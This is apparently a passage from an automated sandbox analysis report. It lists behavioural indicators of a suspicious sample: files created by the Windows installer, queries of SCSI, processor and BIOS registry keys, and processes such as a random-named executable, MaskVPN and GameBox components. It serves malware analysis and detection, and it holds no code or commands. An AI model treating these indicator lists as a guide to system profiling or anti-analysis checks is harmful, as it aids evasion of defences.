| File created | C:\Windows\SystemTemp\~DF4A5E0F324D2691EE.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA5B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f764ac1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC931.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAB9F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF1BDA4C0F335BF354.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5CE1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA778.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB0E0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB333.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC6AF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF253FAF2D4EF1B032.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
